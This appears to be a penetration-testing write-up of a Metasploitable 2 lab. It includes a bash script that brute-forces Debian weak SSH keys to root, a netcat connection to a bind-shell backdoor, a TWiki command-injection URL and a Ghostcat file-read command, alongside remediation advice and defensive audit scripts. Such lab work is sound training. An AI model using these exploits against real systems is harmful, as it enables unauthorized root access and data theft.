June 13, 2026
From Vulnerabilities to Exploitation — Completing the VAPT Lifecycle (Part 2)
Kuldeep Choudhary
This is Part 2 of my VAPT series. If you haven't read Part 1 (Vulnerability Assessment using Nessus in a Virtual Lab), you can find it here: Part 1 — https://medium.com/@ckuldeep28/vulnerability-assessment-using-nessus-in-a-virtual-lab-7c6a2e2a3d7b
When I published Part 1, I made a promise — that I would come back and complete the penetration testing phase.
That time has come.
In Part 1, I used Nessus to scan a Metasploitable 2 target and identified 38 vulnerabilities ranging from Critical to Low. But identifying vulnerabilities is only half the story. The real question is: which ones can actually be exploited, and what's the real-world impact?
That's exactly what this article covers.
A Quick Recap
Lab Environment:
- 🔹 Attacker: Kali Linux (with Nessus installed)
- 🔹 Target: Metasploitable 2 (192.168.4.33)
- 🔹 Both machines on the same network using Bridged Adapter
The Nessus scan from Part 1 returned findings across all severity levels. For this penetration testing phase, I focused on the Critical vulnerabilities first, then selected a few notable High severity findings worth demonstrating.
The full PoC evidence for all 38 vulnerabilities is documented in my GitHub repository — link at the end of this article.
The Approach
Rather than using automated exploitation frameworks for everything, I focused on manual and semi-manual PoC techniques wherever possible. This is a deliberate choice — it demonstrates a deeper understanding of what's actually happening, which matters more in a professional context than just running Metasploit modules.
Each finding below follows the same structure:
- What Nessus flagged
- What the vulnerability actually means
- How I validated it
- Remediation recommendation
🔴 Critical Findings
1. Debian OpenSSH/OpenSSL Weak Keys — CVE-2008-0166 (CVSS 10.0)
Port: 22 (SSH)
What it is: In 2008, Debian's OpenSSL package had a broken random number generator. Instead of generating truly random SSH keys, it could only produce around 32,767 unique key combinations — all of which were pre-computed and published by HD Moore of Metasploit.
This means any SSH key generated on an affected Debian/Ubuntu system is effectively guessable.
How I validated it:
I wrote a custom bash script to iterate through the pre-generated key archive and attempt SSH authentication against the target:
```bash
#!/bin/bash
# Walk the pre-generated 2048-bit RSA key archive and try each key
# against the target; stop at the first one that returns a shell.
find rsa/2048/ -type f | while IFS= read -r k; do
    chmod 600 "$k"
    echo "[-] Trying: $k"
    # Modern OpenSSH disables ssh-rsa by default; re-enable it for this
    # legacy target. BatchMode prevents interactive prompts.
    result=$(ssh -oHostKeyAlgorithms=+ssh-rsa \
        -oPubkeyAcceptedAlgorithms=+ssh-rsa \
        -oBatchMode=yes \
        -oConnectTimeout=5 \
        -i "$k" root@192.168.4.33 \
        "id" 2>&1)
    if echo "$result" | grep -q "uid="; then
        echo "[+] WORKING KEY: $k"
        echo "$result"
        break
    fi
done
```
Result:
```
[+] WORKING KEY: rsa/2048/57c3115d77c56390332dc5c49978627a-5429
uid=0(root) gid=0(root) groups=0(root)
```
Root access confirmed. No password required.
Remediation: Regenerate all SSH, SSL, and OpenVPN keys using a patched version of OpenSSL. Any key material generated on the affected system must be considered compromised.
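The remediation above is easy to state and hard to verify by hand: a host can be patched and still trust a weak key in someone's authorized_keys. The following Python script is an added defender-side example written for this article, not code from the original post or from any of the tools it mentions. It parses an authorized_keys file, computes the classic MD5 fingerprint of each public key, and matches it against a weak-key blocklist. The blocklist format is an assumption taken from the Debian openssh-blacklist package (the last 20 hex digits of the MD5 fingerprint); the sample authorized_keys content and the key blobs in it are constructed placeholders, not real keys.

```python
import base64
import hashlib
import re

# Constructed sample authorized_keys file. The key blobs are base64 of
# placeholder bytes, not real RSA keys; the audit only needs their
# fingerprints, so stand-ins are enough to exercise the logic.
WEAK_BLOB = base64.b64encode(b"constructed weak key material").decode()
GOOD_BLOB = base64.b64encode(b"constructed good key material").decode()
SAMPLE_AUTHORIZED_KEYS = f"""\
# root's authorized_keys (constructed example)
ssh-rsa {WEAK_BLOB} deploy@legacy-box
command="/usr/bin/rsync --server" ssh-rsa {GOOD_BLOB} backup@nas
"""

# Key type, base64 blob, optional comment; options before the type are skipped.
KEY_LINE = re.compile(
    r"(ssh-rsa|ssh-dss|ssh-ed25519|ecdsa-sha2-\S+)\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?"
)


def md5_fingerprint(blob_b64: str) -> str:
    """Hex MD5 of the decoded public-key blob (the old OpenSSH fingerprint)."""
    return hashlib.md5(base64.b64decode(blob_b64)).hexdigest()


def blocklist_id(fingerprint_hex: str) -> str:
    """Assumed openssh-blacklist convention: drop the first 12 of the
    32 hex digits and keep the remaining 20."""
    return fingerprint_hex[12:]


def parse_authorized_keys(text: str):
    """Yield (line_no, key_type, blob, comment) for each key line,
    skipping blank lines and comments."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_LINE.search(line)
        if m:
            yield line_no, m.group(1), m.group(2), (m.group(3) or "").strip()


def audit_authorized_keys(text: str, blocklist: set):
    """Return (line_no, key_type, comment) for every key on the blocklist."""
    flagged = []
    for line_no, key_type, blob, comment in parse_authorized_keys(text):
        if blocklist_id(md5_fingerprint(blob)) in blocklist:
            flagged.append((line_no, key_type, comment))
    return flagged


if __name__ == "__main__":
    # Stand-in blocklist built from the constructed weak key. On a real host
    # you would load the distribution's blacklist.RSA-2048 file instead.
    weak_ids = {blocklist_id(md5_fingerprint(WEAK_BLOB))}
    for line_no, key_type, comment in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, weak_ids):
        print(f"line {line_no}: {key_type} key '{comment}' is on the weak-key blocklist")
```

Run it against every authorized_keys file on the host (root's included) and against the keys in your CA or bastion inventory; the same fingerprint-set check also works for SSL certificates if you swap in the matching blocklist.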
2. Bind Shell Backdoor Detection (CVSS 10.0)
Port: 1524
What it is: A shell is listening on port 1524 with no authentication whatsoever. Anyone who connects to this port gets an interactive root shell immediately — no credentials, no exploit needed.
This is a deliberate backdoor that ships with Metasploitable 2, simulating a compromised host.
How I validated it:
```
nc 192.168.4.33 1524
```
Immediate response:
```
root@metasploitable:/#
```
Remediation: Verify whether the system has been compromised. If confirmed, reinstall the OS entirely. Audit all running services for unexpected listeners.
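The backdoor is planted on purpose in Metasploitable 2, but the remediation step (audit for unexpected listeners) is the part that carries over to real systems. The script below is an added example written for this article, not the author's or Metasploitable's own code. It reads the kernel's /proc/net/tcp table, decodes the little-endian hex addresses, keeps only sockets in the LISTEN state, and reports any port not on an allowlist. The /proc/net/tcp excerpt is constructed so the code runs offline; on a Linux host you would pass the real file (and /proc/net/tcp6) instead.

```python
import socket
import struct

# Constructed /proc/net/tcp excerpt: SSH and HTTP listening on all
# interfaces, a loopback-only MySQL listener, one established SSH
# connection, and the unexplained listener on 1524 (0x05F4). Column
# layout follows the kernel; trailing fields are abbreviated.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11001 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 11002 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   104        0 11003 1 0000000000000000 100 0 0 10 0
   3: 00000000:05F4 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11004 1 0000000000000000 100 0 0 10 0
   4: 2104A8C0:0016 0A04A8C0:D2C4 01 00000000:00000000 00:00000000 00000000     0        0 11005 1 0000000000000000 20 4 30 10 -1
"""

TCP_LISTEN = "0A"  # value of the 'st' column for a listening socket


def decode_addr(hex_addr: str):
    """'0100007F:0016' -> ('127.0.0.1', 22). The IPv4 word is stored
    little-endian, so it is unpacked with '<I' before inet_ntoa."""
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_listeners(text: str):
    """Return [(ip, port, uid)] for every socket in LISTEN state."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        # Data rows start with 'N:'; the header row does not.
        if len(fields) < 8 or not fields[0].endswith(":"):
            continue
        if fields[3] != TCP_LISTEN:
            continue
        ip, port = decode_addr(fields[1])
        listeners.append((ip, port, int(fields[7])))
    return listeners


def unexpected_listeners(text: str, allowed_ports, include_loopback=False):
    """Listeners whose port is not on the allowlist, sorted by port.
    Loopback-only services are skipped unless asked for."""
    found = []
    for ip, port, uid in parse_listeners(text):
        if port in allowed_ports:
            continue
        if ip == "127.0.0.1" and not include_loopback:
            continue
        found.append((ip, port, uid))
    return sorted(found, key=lambda t: (t[1], t[0]))


if __name__ == "__main__":
    # The allowlist is whatever the host's build document says it should serve.
    for ip, port, uid in unexpected_listeners(SAMPLE_PROC_NET_TCP, {22, 80}):
        print(f"unexpected listener {ip}:{port} (uid {uid})")
```

A listener owned by uid 0 on a high, undocumented port is exactly the shape of finding that should trigger the "verify whether the system has been compromised" step rather than a config tweak; the uid column is included for that reason.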
3. VNC Server Default Password (CVSS 10.0)
Port: 5900
What it is: The VNC server on the target is secured with the password password. Nessus confirmed this by logging in successfully. A remote attacker can gain full graphical desktop control without any technical knowledge.
How I validated it:
Connected using a VNC client with the password password:
```
vncviewer 192.168.4.33
```
Full desktop access granted immediately.
Remediation: Set a strong, unique VNC password. Better still, disable VNC entirely and use SSH tunnelling for remote access.
4. Apache PHP-CGI Remote Code Execution — CVE-2012-1823 (CVSS 7.5)
Port: 80
What it is: The PHP installation on the target allows an attacker to pass command-line arguments via query strings to the PHP-CGI program. This can be abused to execute arbitrary commands on the server, read source code, or crash the service.
This is a well-known and heavily exploited vulnerability (CVSS 7.5, listed as Critical by Nessus).
How I validated it:
Nessus confirmed this with a crafted POST request to /cgi-bin/php. The server responded by executing the id command, confirming remote code execution.
Remediation: Upgrade to PHP 5.3.13 / 5.4.3 or later. If using CGI mode, ensure PHP-CGI is not exposed directly.
5. Apache Tomcat Ghostcat — CVE-2020-1938 (CVSS 5.0)
Port: 8009 (AJP Connector)
What it is: The Apache Tomcat AJP connector has a file read/inclusion vulnerability known as Ghostcat. An unauthenticated attacker can read any file from within the web application, including configuration files containing credentials. On servers that allow file uploads, this escalates to Remote Code Execution.
How I validated it:
Beyond Nessus detection, I manually confirmed this using ajpShooter.py, a public Ghostcat exploit tool:
```
python ajpShooter.py http://192.168.4.33:8080/ 8009 /WEB-INF/web.xml read
```
The server responded with 200 OK and returned the full contents of web.xml, confirming unauthenticated file read via the AJP connector.
Remediation: Upgrade Apache Tomcat to 7.0.100, 8.5.51, or 9.0.31+. If the AJP connector is not needed, disable it entirely in server.xml.
6. SSL Version 2 and 3 Protocol Detection (CVSS 9.8)
Ports: 25, 5432
What it is: The target accepts connections using SSLv2 and SSLv3 — both deprecated protocols with known cryptographic weaknesses including insecure padding in CBC mode and unsafe session renegotiation. This exposes connections to POODLE and DROWN attacks.
To further confirm the POODLE exposure, I ran a targeted Nmap script:
Remediation: Disable SSLv2 and SSLv3 entirely. Enforce TLS 1.2 or higher with approved cipher suites.
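Port 25 on the target is an SMTP server; assuming it is Postfix (the article does not name the MTA), the remediation comes down to the protocol list in main.cf. The script below is an added example written for this article, not the author's code or part of Postfix. It parses a minimal main.cf, evaluates the three spellings Postfix accepts for a protocol list (exclusions such as "!SSLv2, !SSLv3", an explicit inclusion list, or a ">=TLSv1.2" bound, the last one from Postfix 3.6 on), and reports any parameter that still admits a protocol older than TLS 1.2. Both config snippets are constructed; the parameter names are real Postfix parameters.

```python
# Protocol names in version order, spelled as Postfix and OpenSSL spell them.
PROTOCOLS = ["SSLv2", "SSLv3", "TLSv1", "TLSv1.1", "TLSv1.2", "TLSv1.3"]
MINIMUM_ACCEPTABLE = "TLSv1.2"

# Constructed "before" config: only SSLv2 excluded, so SSLv3 is still accepted,
# and the mandatory-TLS list is left at the build's default.
WEAK_MAIN_CF = """\
# legacy main.cf (constructed)
smtpd_use_tls = yes
smtpd_tls_protocols = !SSLv2
"""

# Constructed "after" config: TLS 1.2 as the floor for both opportunistic
# and mandatory TLS.
FIXED_MAIN_CF = """\
smtpd_tls_security_level = may
smtpd_tls_protocols = >=TLSv1.2
smtpd_tls_mandatory_protocols = >=TLSv1.2
"""


def parse_main_cf(text: str) -> dict:
    """Minimal main.cf reader: 'key = value' lines, comments and blanks
    skipped, later keys override earlier ones. Continuation lines and
    $variable expansion are deliberately not handled."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def allowed_protocols(spec: str) -> set:
    """Set of protocols a Postfix protocol list permits. An empty list
    means everything; '!X' excludes; bare names include only those;
    '>=X' / '<=X' bound the range (my reading of the Postfix docs)."""
    tokens = spec.replace(",", " ").split()
    lo, hi, bounded = 0, len(PROTOCOLS) - 1, False
    for t in tokens:
        if t.startswith(">="):
            lo, bounded = PROTOCOLS.index(t[2:]), True
        elif t.startswith("<="):
            hi, bounded = PROTOCOLS.index(t[2:]), True
    if bounded:
        return set(PROTOCOLS[lo:hi + 1])
    excluded = {t[1:] for t in tokens if t.startswith("!")}
    included = {t for t in tokens if not t.startswith("!")}
    base = included if included else set(PROTOCOLS)
    return base - excluded


def audit_postfix_tls(text: str):
    """Return (parameter, problem) pairs for protocol lists that admit
    anything below MINIMUM_ACCEPTABLE, or that are not set at all."""
    settings = parse_main_cf(text)
    findings = []
    floor = PROTOCOLS.index(MINIMUM_ACCEPTABLE)
    for param in ("smtpd_tls_protocols", "smtpd_tls_mandatory_protocols"):
        if param not in settings:
            findings.append((param, "not set; the build's default applies, verify it explicitly"))
            continue
        allowed = allowed_protocols(settings[param])
        too_old = [p for p in PROTOCOLS if p in allowed and PROTOCOLS.index(p) < floor]
        if too_old:
            findings.append((param, "permits " + ", ".join(too_old)))
    return findings


if __name__ == "__main__":
    for label, cf in (("weak", WEAK_MAIN_CF), ("fixed", FIXED_MAIN_CF)):
        print(label, audit_postfix_tls(cf) or "no findings")
```

The PostgreSQL side (port 5432) is simpler: PostgreSQL 12 and later expose a single ssl_min_protocol_version setting, which should be 'TLSv1.2' or higher. Whatever the config says, confirm it from the network as well, since a config lint cannot see a second listener started from a different config file.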
7. phpMyAdmin SQL Injection — CVE-2019-11768 (CVSS 5.0)
Port: 80
What it is: The installed version of phpMyAdmin (3.1.1) is vulnerable to SQL injection in the designer feature. An unauthenticated attacker can manipulate database queries, potentially disclosing or modifying arbitrary data. The fixed version is 4.8.6.
How I validated it:
I confirmed version exposure. Full SQLi exploitation was not performed in this assessment.
Remediation: Upgrade to phpMyAdmin 4.8.6 or later immediately.
🟠 Notable High Findings
8. TWiki 'rev' Parameter Command Execution — CVE-2005-2877 (CVSS 4.0)
Port: 80
What it is: The TWiki installation allows an attacker to inject shell commands through the rev parameter. This results in arbitrary command execution under the web server's user account (www-data).
How I validated it:
The following URL triggered command execution:
```
http://192.168.4.33/twiki/bin/view/Main/TWikiUsers?rev=2%20%7cid%7c%7cecho%20
```
Response:
```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
To further confirm command execution, I replaced the id command with hostname in the URL:
```
http://192.168.4.33/twiki/bin/view/Main/TWikiUsers?rev=2%20%7cid%7c%7chostname%20
```
The page returned metasploitable — confirming we have arbitrary command execution on the target machine.
Remediation: Apply the hotfix referenced in the TWiki vendor advisory, or upgrade to a patched version.
9. NFS Shares World-Readable (CVSS 4.0)
Port: 2049
What it is: The NFS server is exporting shares without any access restrictions. The root filesystem (/ *) is accessible to anyone on the network. This allows an attacker to read sensitive files including /etc/shadow, SSH keys, and application configs.
Remediation: Restrict NFS exports by IP range or hostname in /etc/exports. Never export the root filesystem.
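An /etc/exports file is short enough to eyeball, but the two ways of exporting to the world ("*" as the client, or options with no client at all, as in "/tmp (rw)") are easy to miss in a hurry. The script below is an added example written for this article, not the author's code. It parses /etc/exports and reports world exports, exports of the root filesystem, and the no_root_squash option, which lets a remote root read files exactly as local root would. The exports file content is constructed for the example.

```python
import re

# Constructed /etc/exports: the root filesystem exported to everyone
# without root squashing, a properly scoped backup share, and a share
# whose options have no client in front of them.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed)
/            *(rw,sync,no_root_squash,no_subtree_check)
/srv/backup  192.168.4.0/24(ro,sync,root_squash)
/tmp         (rw)
"""

# 'client(opt,opt)' -> client part and option part; both are optional.
CLIENT_SPEC = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text: str):
    """Return [(path, [(client, [options])])] for each export line.
    Comments (full-line or trailing) and blank lines are ignored."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], []
        for spec in parts[1:]:
            m = CLIENT_SPEC.match(spec)
            client = m.group(1)
            opts = [o for o in (m.group(2) or "").split(",") if o]
            clients.append((client, opts))
        exports.append((path, clients))
    return exports


def audit_exports(text: str):
    """Return (path, problem) pairs. A client of '*' or an empty client
    (options given with no host) exports to every host that can reach
    the NFS port."""
    findings = []
    for path, clients in parse_exports(text):
        for client, opts in clients:
            if client in ("", "*"):
                who = client or "no client given, applies to all"
                findings.append((path, f"exported to every host ({who})"))
            if "no_root_squash" in opts:
                findings.append((path, f"no_root_squash for {client or 'every host'}"))
        if path == "/":
            findings.append((path, "root filesystem is exported"))
    return findings


if __name__ == "__main__":
    for path, problem in audit_exports(SAMPLE_EXPORTS):
        print(f"{path}: {problem}")
```

The fix for each finding is the one the remediation line gives: name the client network explicitly (for example 192.168.4.0/24), keep root_squash, and never put "/" in the file.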
10. rlogin / rsh Services — CVE-1999-0651 (CVSS 7.5)
Ports: 513 (rlogin), 514 (rsh)
What it is: Both rlogin and rsh are legacy remote access services running on the target. These services were misconfigured with a trust relationship via .rhosts, allowing an attacker to log in as root without any username or password. Additionally, these protocols transmit all data including credentials in cleartext — meaning any credentials used would be fully visible to anyone intercepting network traffic.
Remediation: Disable both services immediately. Comment out the relevant lines in /etc/inetd.conf and replace with SSH.
11. Samba Badlock Vulnerability — CVE-2016-2118 (CVSS 4.3)
Port: 445
What it is: The Samba version running on the target is affected by the Badlock vulnerability — a flaw in the SAM and LSAD protocols that allows a man-in-the-middle attacker to downgrade authentication and execute arbitrary Samba network calls, including viewing or modifying Active Directory data.
How I validated it:
Nessus detected Samba version 3.0.20-Debian running on port 445, which falls within the affected version range. The Badlock vulnerability requires a man-in-the-middle position to exploit — full exploitation was not performed in this lab environment. Detection was confirmed via Nessus and version fingerprinting.
Remediation: Upgrade to Samba 4.2.11, 4.3.8, or 4.4.2+.
Summary Table
| # | Vulnerability | Severity | CVSS | CVE | Port | Impact |
|---|---|---|---|---|---|---|
| 1 | Debian OpenSSL Weak Keys | Critical | 10.0 | CVE-2008-0166 | 22 | Root shell via SSH |
| 2 | Bind Shell Backdoor | Critical | 10.0 | – | 1524 | Unauthenticated root shell |
| 3 | VNC Default Password | Critical | 10.0 | – | 5900 | Full desktop control |
| 4 | PHP-CGI Remote Code Execution | Critical | 7.5 | CVE-2012-1823 | 80 | Remote code execution |
| 5 | Ghostcat AJP Connector | Critical | 5.0 | CVE-2020-1938 | 8009 | File read / RCE |
| 6 | SSL v2/v3 Protocol | Critical | 9.8 | – | 25, 5432 | MITM / traffic decryption |
| 7 | phpMyAdmin SQLi | Critical | 5.0 | CVE-2019-11768 | 80 | Database manipulation |
| 8 | TWiki Command Execution | High | 4.0 | CVE-2005-2877 | 80 | OS command execution |
| 9 | NFS World-Readable | High | 4.0 | – | 2049 | Sensitive file exposure |
| 10 | rlogin / rsh Services | High | 7.5 | CVE-1999-0651 | 513, 514 | Credential interception |
| 11 | Samba Badlock | High | 4.3 | CVE-2016-2118 | 445 | Auth downgrade / MITM |
Key Takeaways
This exercise reinforced something important — a vulnerability score is just a number until it's validated. Several findings that seemed theoretical on paper resulted in immediate, unauthenticated root access in practice.
A few things I took away from this project:
Nessus is a starting point, not a conclusion. The scanner flagged 38 issues. The real work was understanding which ones had genuine exploitability and what the actual impact would be in a real environment.
Writing your own tools matters. Rather than relying entirely on pre-built Metasploit modules, I built a custom bash script for the CVE-2008-0166 exploitation. This forced a much deeper understanding of how the vulnerability actually works — knowledge that transfers to real engagements.
Legacy services are dangerous. rlogin, rsh, Telnet, SSLv2, SSLv3 — these are ancient protocols that should not exist on any modern system. Yet they consistently appear in real-world assessments.
What's Next
The full PoC evidence ZIP folder — all 38 vulnerabilities documented with screenshots — is available in my GitHub repository:
🔗 GitHub Repository: [Link to your GitHub repo here]
That folder contains individual PoC directories for every finding from Critical down to Low, including medium findings like HTTP TRACE/TRACK methods, clickjacking, browsable directories, and more.
Thanks for reading. If you found this useful, the VA phase is documented in Part 1 linked at the top of this article.